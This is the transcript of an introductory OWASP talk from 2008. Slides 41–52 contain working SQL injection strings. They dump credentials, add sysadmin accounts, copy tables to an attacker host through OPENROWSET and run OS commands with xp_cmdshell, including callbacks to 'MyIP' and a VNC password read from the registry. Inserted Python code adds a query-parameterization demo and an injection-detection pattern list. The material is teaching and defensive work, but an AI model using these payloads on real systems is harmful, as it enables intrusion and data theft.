OWASP an Introduction
Small presentation about Web Application Security and SQL Injection.
  • Transcript

    • 1. OWASP: An Introduction Alessio Marziali December, 2008 alessio.marziali @cyphersec.com
    • 2. Agenda
      • What is OWASP?
        • General Overview of OWASP
        • OWASP Projects
        • OWASP Guides
      • OWASP EU Summit 2008
      • OWASP Code Crawler
      • What is Application Security?
      • Play time, Advanced SQL Injection (fun!)
    • 3. What is OWASP?
      • Open Web Application Security Project
        • The OWASP Foundation is a United States based 501(c)(3) (non-profit) entity that provides the infrastructure for the OWASP Community.
        • Focused primarily on “back-end” rather than “web-design” issues.
        • Promotes secure software development
        • An open forum for discussion
        • A free resource for any development team
    • 4. What is OWASP?
      • Open Web Application Security Project
        • Non-profit, volunteer driven organization
          • All members are volunteers
          • All work is donated by sponsors
        • Provide free resources to the community
          • Publications, Articles, Standards
          • Testing and Training Software
          • Local Chapters & Mailing Lists
        • Supported through sponsorships
          • Corporate support through financial or project sponsorship
          • Personal sponsorships from members
    • 5. OWASP Sponsors
    • 6. What is OWASP?
      • What do they provide?
        • Publications
          • OWASP Top 10
          • OWASP Guide to Building Secure Web Applications
        • Software (only the most important)
          • WebGoat
          • WebScarab
          • .NET Projects
        • Local Chapters
          • Community Orientation
    • 7. OWASP Publications
      • Major Publications
      • Top 10 Web Application Security Vulnerabilities
        • Guide to Building Secure Web Applications
        • Testing Project
        • AppSec Faq
    • 8. OWASP Publications
      • Common Features
        • All OWASP publications are available free for download from http://www.owasp.org
        • Publications are released under the GNU Lesser General Public License, or the GNU Free Documentation License (GFDL)
        • Living Documents
          • Updating as needed
          • Ongoing Projects
        • OWASP Publications feature collaborative work in a competitive field
    • 9. OWASP Publications – OWASP TOP 10
      • Top 10 Web Application Security Vulnerabilities
        • A list of the 10 most severe security issues
        • Updated on a yearly basis
        • Address issues with applications on the perimeter
        • Growing industry acceptance
          • Federal Trade Commission (US Gov)
          • NSA – National Security Agency (US Gov)
          • US Defense Information Systems Agency
          • VISA (Cardholder Information Security Program)
          • British Telecom
          • Bureau of Alcohol, Tobacco, and Firearms (ATF)
    • 10. OWASP Publications - OWASP TOP 10
    • 11. OWASP Publications - OWASP Guides
      • Guide to Building Secure Web Applications
        • Provides a baseline for developing secure software
          • Introduction to security in general
          • Introduction to application level security
          • Discusses key implementation areas
            • Architecture
            • Authentication
            • Session Management
            • Access Controls and Authorization
            • Event Logging
            • Data Validation
        • Under continuous development
    • 12. OWASP Software
      • Major Applications
      • WebGoat
      • WebScarab
      • .Net Projects
    • 13. OWASP Software
      • Common Features
        • All OWASP software is provided free for download from http://www.owasp.org
        • Software is released under the GNU Lesser General Public License
        • Active Projects
          • Updating as needed
          • Ongoing Projects
          • Many maintainers and contributors
        • OWASP Software is free for download and can be used by individuals or businesses
    • 14. OWASP Software - WebGoat
      • WebGoat
        • Primarily a training application
        • Provides
          • An educational tool for learning about application security
          • A baseline to test security tools against (i.e. known issues)
        • What is it?
          • A J2EE web application arranged in “Security Lessons”
          • Based on Tomcat and JDK 1.5
          • Oriented to learning
            • Easy to use
            • Illustrates credible scenarios
            • Teaches realistic attacks, and viable solutions
    • 15. OWASP Software - WebGoat
      • WebGoat – What can you learn?
        • A number of constantly growing attacks and solutions
          • Cross Site Scripting
          • SQL Injection Attacks
          • Thread Safety
          • Field & Parameter Manipulation
          • Session Hijacking and Management
          • Weak Authentication Mechanisms
          • Many more attacks added
        • Getting the Tools
          • http://www.owasp.org/software/webgoat.html
          • Simply download, unzip, and execute
    • 16. OWASP Software - WebScarab
      • WebScarab
        • A framework for analyzing HTTP/HTTPS traffic
        • Written in Java
        • Multiple Uses
          • Developer: Debug exchanges between client and server
          • Security Analyst: Analyze traffic to identify vulnerabilities
        • Technical Tool
          • Focused on software developers
          • Extensible plug-in architecture
          • Open source; easy to extend core system
          • Very powerful tool
        • Getting the Tool
          • http://www.owasp.org/software/webscarab.html
    • 17. OWASP Software - WebScarab
      • What can it do?
        • Features
          • Fragment Analysis – extract scripts and html as presented to the browser, instead of source code presented by the browser post render
          • Proxy – observe traffic between the browser and server, includes the ability to modify data in transit, expose hidden fields, and perform bandwidth manipulation
          • BeanShell – the ability to execute Java code on requests and responses before being transmitted between the browser and server; allows runtime extension of WebScarab
          • Spider – identifies new URLs within each page viewed
          • SessionID Analysis – Collection and analysis of cookies to determine predictability of session tokens
          • Much more…
    • 18. OWASP Software - .NET Projects
      • .Net Projects
        • A collection of tools focused on securing ASP.NET projects
        • Include security analyzers and documentation projects
        • Current Projects
          • Asp.Net Baseline Security – a suite of tools to assist administrators in identifying common issues in Asp.Net deployments
          • SAM’SHE – Security Analyzer for Microsoft's Shared Hosting Environments – toolkit for administrators to identify issues in IIS 5 or 6 Asp.Net deployments
          • ANSA – Asp.Net Security Analyzer written in C# to identify configuration and software issues that impact security
          • Asp.Net Security Guides – a set of documents covering the design and deployment of secure software in Asp.Net hosting environments
        • http://www.owasp.org/software/dotnet.html
    • 19. OWASP Local Chapters
      • What do we have to offer?
        • Monthly Meetings
          • An opportunity to listen to monthly presentations introducing OWASP (prior to regular meetings)
          • An opportunity to attend special presentations focused on OWASP projects, and focusing on specific areas of interest
          • An opportunity to work with organizers to show additional presentations and develop workshops to address specific issues
          • An open environment for discussion of information security suitable for novices, professionals, and experts
          • Free Drinks !!!!!
    • 20. OWASP EU Summit 2008
      • “ALGARVE, PORTUGAL, November 7, 2008 – The Open Web Application Security Project (OWASP) today announced results from the annual OWASP Summit. Over 80 application security experts from over 20 countries joined forces to identify, coordinate, and prioritize our 2009 efforts to create a more secure Internet.”
    • 21. OWASP EU Summit 2008
      • OWASP Summer of Code 2008 Sponsored Projects
      • SETTING THE WEB APPLICATION SECURITY AGENDA FOR 2009, 3rd - 7th November 2008
    • 22. OWASP Code Crawler Project
    • 23. More about Code Crawler
      • Fast Scan
        • ~1000 lines of code (~3 seconds to review)
      • Multi Languages Support
        • .NET (C#,VB, don’t say F#!)
        • Java
      • Integrated Editor
        • Visual Studio-like visualisation
          • C# Code colouring
          • Even “#region” blocks are supported
    • 24. Technologies used
      • .NET Framework 3.5 SP1
      • C# 3.0
      • Windows Forms
      • XSLT
      • Workflow Foundation
      • Microsoft Charts
      • XML/XPath
    • 25. Why we have to change the way we think
    • 26. Myth
      • Myth: “We are secure because we have a firewall”
        • 75% of Internet Vulnerabilities are at Web Application Layer *
      • *GartnerGroup (2002 report)
    • 27. Myth (Source: Jeremiah Grossman, BlackHat 2001)
    • 28. Myth
      • Myth 2 – “We are secure because we use SSL”
        • Only secures data in transit
        • Does not solve vulnerabilities on:
          • Web server
          • Software
          • Browser
    • 29. Myth (Source: Jeremiah Grossman, BlackHat 2001)
    • 30. Myth
      • (Diagram: Network Layer: Firewall, Hardened OS, Web Server, App Server, Firewall; Application Layer: Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing, Custom Developed Application Code; APPLICATION ATTACK)
      • You can’t use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks
      • Your security “perimeter” has huge holes at the application layer
    • 31. What is Web Application Security?
    • 32. Web Application Security
      • Combination of
        • People,
        • Processes,
        • and Technology
      • to identify, measure, and manage
        • Risk
      (*) Commercial Off The Shelf
    • 33. What is Web Application (in)Security?
    • 34. What is SQL Injection?
      • The ability to inject SQL commands into the database engine through an existing application
    • 35. How does SQL Injection work?
      • Common vulnerable login query
        • SELECT * FROM users
        • WHERE login = 'victor'
        • AND password = '123'
      • (If it returns something then login!)
      • Pseudo Code MS SQL Server login syntax
        • var sql = "SELECT * FROM users
        • WHERE login = '" + formusr +
        • "' AND password = '" + formpwd + "'";
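Worked version of the slide's pseudo code, added here (it is not from the slides), using Python's sqlite3 as a stand-in for SQL Server: the concatenated query beside the parameterized one, both run against a constructed one-row users table, so that an input containing a quote can be seen to change the query's meaning in the first and to stay a plain value in the second. The table layout and the inputs are assumptions.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the slide's users table (one row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('victor', '123')")
    return conn

def login_concat(conn, formusr, formpwd):
    """The slide's pattern: form fields pasted straight into the SQL text."""
    sql = ("SELECT * FROM users WHERE login = '" + formusr +
           "' AND password = '" + formpwd + "'")
    # "If it returns something then login!"
    return conn.execute(sql).fetchone() is not None

def login_param(conn, formusr, formpwd):
    """Same query with bound parameters: the driver never parses the input as SQL."""
    sql = "SELECT * FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (formusr, formpwd)).fetchone() is not None

def compare(formusr, formpwd):
    """Run both versions on one input; the concatenated one may not even parse."""
    conn = make_db()
    try:
        concat = login_concat(conn, formusr, formpwd)
    except sqlite3.OperationalError as exc:   # e.g. an unmatched quote
        concat = "error: " + str(exc)
    return {"concat": concat, "param": login_param(conn, formusr, formpwd)}

if __name__ == "__main__":
    # Legitimate credentials: both versions agree.
    print(compare("victor", "123"))
    # Wrong password plus a tautology: the concatenated WHERE becomes
    # login='victor' AND password='x' OR '1'='1', which is always true.
    print(compare("victor", "x' OR '1'='1"))
    # A trailing comment removes the password check from the concatenated query.
    print(compare("victor' --", "wrong"))
    # A legitimate apostrophe breaks the concatenated query outright.
    print(compare("O'Brien", "pw"))
```

The `--` comment syntax shown on the later slides behaves the same way in SQLite, so the third case reproduces the slides' technique; only the parameterized version rejects all three non-credential inputs.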
    • 36. SQL Injection Testing Methodology: 1) Input Validation, 2) Info. Gathering, 3) 1=1 Attacks, 4) Extracting Data, 5) OS Interaction, 6) OS Cmd Prompt, 7) Expand Influence
    • 37. Some differences
      • Concatenate Strings
        • MS SQL (T-SQL): ' '+' '
        • MySQL: concat(" ", " ")
        • Access: " "&" "
        • Oracle (PL/SQL): ' '||' '
        • DB2: " "+" "
        • Postgres (PL/pgSQL): ' '||' '
      • Null replace
        • MS SQL (T-SQL): Isnull()
        • MySQL: Ifnull()
        • Access: Iff(Isnull())
        • Oracle (PL/SQL): Ifnull()
        • DB2: Ifnull()
        • Postgres (PL/pgSQL): COALESCE()
      • Position
        • MS SQL (T-SQL): CHARINDEX
        • MySQL: LOCATE()
        • Access: InStr()
        • Oracle (PL/SQL): InStr()
        • DB2: InStr()
        • Postgres (PL/pgSQL): TEXTPOS()
      • Op Sys interaction
        • MS SQL (T-SQL): xp_cmdshell
        • MySQL: select into outfile / dumpfile
        • Access: #date#
        • Oracle (PL/SQL): utl_file
        • DB2: import from / export to
        • Postgres (PL/pgSQL): Call
      • Cast
        • MS SQL (T-SQL): Yes
        • MySQL: No
        • Access: No
        • Oracle (PL/SQL): No
        • DB2: Yes
        • Postgres (PL/pgSQL): Yes
    • 38. More differences…
      • UNION
        • MS SQL: Y
        • MySQL: Y
        • Access: Y
        • Oracle: Y
        • DB2: Y
        • Postgres: Y
      • Subselects
        • MS SQL: Y
        • MySQL: N (4.0), Y (4.1)
        • Access: N
        • Oracle: Y
        • DB2: Y
        • Postgres: Y
      • Batch Queries
        • MS SQL: Y
        • MySQL: N*
        • Access: N
        • Oracle: N
        • DB2: N
        • Postgres: Y
      • Default stored procedures
        • MS SQL: Many
        • MySQL: N
        • Access: N
        • Oracle: Many
        • DB2: N
        • Postgres: N
      • Linking DBs
        • MS SQL: Y
        • MySQL: Y
        • Access: N
        • Oracle: Y
        • DB2: Y
        • Postgres: N
    • 39. Enumerating table columns in different DBs
      • MS SQL
        • SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')
        • sp_columns tablename (this stored procedure can be used instead)
      • MySQL
        • show columns from tablename
      • Oracle
        • SELECT * FROM all_tab_columns WHERE table_name='tablename'
      • DB2
        • SELECT * FROM syscat.columns WHERE tabname='tablename'
      • Postgres
        • SELECT attnum, attname FROM pg_class, pg_attribute WHERE relname='tablename' AND pg_class.oid=attrelid AND attnum > 0
    • 40. Methodology step 4) Extracting Data
    • 41. Password grabbing
      • Grabbing username and passwords from a User Defined table
        • '; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+login+'/'+password+' ' from users where login>@var select @var as var into temp end --
        • ' and 1 in (select var from temp) --
        • ' ; drop table temp --
    • 42. Create DB Accounts
      • MS SQL
        • exec sp_addlogin 'victor', 'Pass123'
        • exec sp_addsrvrolemember 'victor', 'sysadmin'
      • MySQL
        • INSERT INTO mysql.user (user, host, password) VALUES ('victor', 'localhost', PASSWORD('Pass123'))
      • Access
        • CREATE USER victor IDENTIFIED BY 'Pass123'
      • Postgres (requires UNIX account)
        • CREATE USER victor WITH PASSWORD 'Pass123'
      • Oracle
        • CREATE USER victor IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
        • GRANT CONNECT TO victor ;
        • GRANT RESOURCE TO victor ;
    • 43. Grabbing MS SQL Server Hashes
      • An easy query:
        • SELECT name, password FROM sysxlogins
      • But, hashes are varbinary
        • To display them correctly through an error message we need to hex-encode them
        • And then concatenate all
        • We can only fit 70 name/password pairs in a varchar
        • We can only see 1 complete pair at a time
      • Password field requires dbo access
        • With lower privileges we can still recover user names and brute force the password
    • 44. Transfer DB structure and data
      • Once network connectivity has been tested
      • SQL Server can be linked back to the attacker's DB by using OPENROWSET
      • DB Structure is replicated
      • Data is transferred
      • It can all be done by connecting to a remote port 80 (HTTP)!
    • 45. Transfer DB
      • '; insert into
        • OPENROWSET('SQLoledb',
        • 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
        • 'select * from mydatabase..table1')
        • select * from database..table1 --
      • '; insert into
        • OPENROWSET('SQLoledb',
        • 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
        • 'select * from mydatabase..table2')
        • select * from database..table2 --
    • 46. Methodology step 5) OS Interaction
    • 47. Interacting with the OS
      • Two ways to interact with the OS:
        • Reading and writing system files from disk
          • Find passwords and configuration files
          • Change passwords and configuration
          • Execute commands by overwriting initialization or configuration files
        • Direct command execution
          • We can do anything
      • Both are restricted by the database's running privileges and permissions
    • 48. MS SQL OS Interaction
      • MS SQL Server
        • '; exec master..xp_cmdshell 'ipconfig > test.txt' --
        • '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' --
        • '; begin declare @data varchar(8000) ; set @data='| ' ; select @data=@data+txt+' | ' from tmp where txt<@data ; select @data as x into temp end --
        • ' and 1 in (select substring(x,1,256) from temp) --
        • '; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp --
    • 49. Gathering IP information through reverse lookups
      • Reverse DNS
        • '; exec master..xp_cmdshell 'nslookup a.com MyIP' --
      • Reverse Pings
        • '; exec master..xp_cmdshell 'ping MyIP' --
      • OPENROWSET
        • '; select * from OPENROWSET('SQLoledb', 'uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=MyIP,80;', 'select * from table')
    • 50. Network Reconnaissance
      • Using the xp_cmdshell all the following can be executed:
        • Ipconfig /all
        • Tracert myIP
        • arp -a
        • nbtstat -c
        • netstat -ano
        • route print
    • 51. Methodology step 6) OS Cmd Prompt
    • 52. Retrieving VNC Password from Registry
      • '; declare @out binary(8) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\ORL\WinVNC3\Default', @value_name='Password', @value=@out output select cast(@out as bigint) as x into TEMP --
      • ' and 1 in ( select cast(x as varchar) from temp) --
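A defender-side check written for this page (it is not part of the slides): it parses constructed web-server log lines, URL-decodes each request parameter (including double encoding), and flags the T-SQL fragments the injection strings on the preceding slides rely on (xp_cmdshell, OPENROWSET, xp_regread, sysxlogins, a closing quote followed by a new statement, a trailing comment). The log format, paths, parameter names and sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Identifiers and fragments taken from the slides' injection strings, as they
# appear once the request parameter has been URL-decoded.
INDICATORS = [
    r"xp_cmdshell", r"xp_regread", r"openrowset", r"bulk\s+insert",
    r"sp_addlogin", r"sp_addsrvrolemember", r"sp_columns",
    r"sysxlogins", r"syscolumns", r"sysobjects", r"all_tab_columns",
    r"syscat\.columns", r"pg_attribute",
    r"'\s*(?:or|and)\s+1\s*=\s*1",   # the slides' "1=1 attacks"
    r"'\s*;",                         # quote closed, new statement started
    r"--\s*$",                        # trailing comment eats the rest of the query
]
PATTERN = re.compile("|".join(INDICATORS), re.IGNORECASE)

# Common log format (assumed): client, timestamp, request line, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def deep_decode(value, rounds=3):
    """Undo repeated percent-encoding so a double-encoded payload still surfaces."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(path):
    """Return (param, decoded value, matched fragment) for each flagged parameter."""
    hits = []
    for name, raw in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        value = deep_decode(raw)
        match = PATTERN.search(value)
        if match:
            hits.append((name, value, match.group(0)))
    return hits

def scan_log(lines):
    """Return one finding per flagged parameter: (client_ip, path, param, fragment)."""
    findings = []
    for line in lines:
        parsed = LOG_LINE.match(line)
        if not parsed:
            continue
        ip, _ts, _method, path, _status = parsed.groups()
        for name, _value, fragment in suspicious_params(path):
            findings.append((ip, urlsplit(path).path, name, fragment))
    return findings

# Constructed sample lines (not real traffic); two carry payloads from the slides,
# the last one is a legitimate apostrophe that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2008:10:01:22 +0000] "GET /login.asp?user=victor&pwd=123 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Dec/2008:10:02:03 +0000] "GET /login.asp?user=victor%27%3B+exec+master..xp_cmdshell+%27ipconfig+%3E+test.txt%27+-- HTTP/1.1" 500 88',
    '10.0.0.9 - - [10/Dec/2008:10:02:41 +0000] "GET /item.asp?id=1%2527+and+1+in+(select+var+from+temp)+-- HTTP/1.1" 500 88',
    '10.0.0.7 - - [10/Dec/2008:10:03:10 +0000] "GET /search.asp?q=O%27Brien HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Pair the hits with the 500 status codes in the same lines: the slides' techniques deliberately provoke database errors, so error responses on parameterised endpoints are the second signal to correlate.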
    • 53. Links
      • A lot of SQL Injection related papers
        • http://www.nextgenss.com/papers.htm
        • http://www.spidynamics.com/support/whitepapers/
        • http://www.appsecinc.com/techdocs/whitepapers.html
        • http://www.atstake.com/research/advisories
      • Other resources
        • http://www.owasp.org
        • http://www.sqlsecurity.com
        • http://www.securityfocus.com/infocus/1768